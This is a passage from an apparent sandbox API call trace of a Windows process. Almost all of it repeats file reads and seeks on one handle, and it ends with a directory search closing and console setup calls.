lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.792] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.795] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.795] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.795] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.819] _close (_FileHandle=4) returned 0 [0092.820] FindNextFileW (in: hFindFile=0x2a0e20, lpFindFileData=0x14f59c | out: lpFindFileData=0x14f59c) returned 0 [0092.820] GetLastError () returned 0x12 [0092.820] FindClose (in: hFindFile=0x2a0e20 | out: hFindFile=0x2a0e20) returned 1 [0092.820] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0092.823] _close (_FileHandle=3) returned 0 [0092.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.823] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.824] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7d41ac | out: lpMode=0x4a7d41ac) returned 1 [0092.824] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.824] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7d41b0 | out: lpMode=0x4a7d41b0) returned 1 [0092.824] SetConsoleInputExeNameW () returned 0x1 [0092.824] GetConsoleOutputCP () returned 0x1b5 [0092.824] GetCPInfo (in: 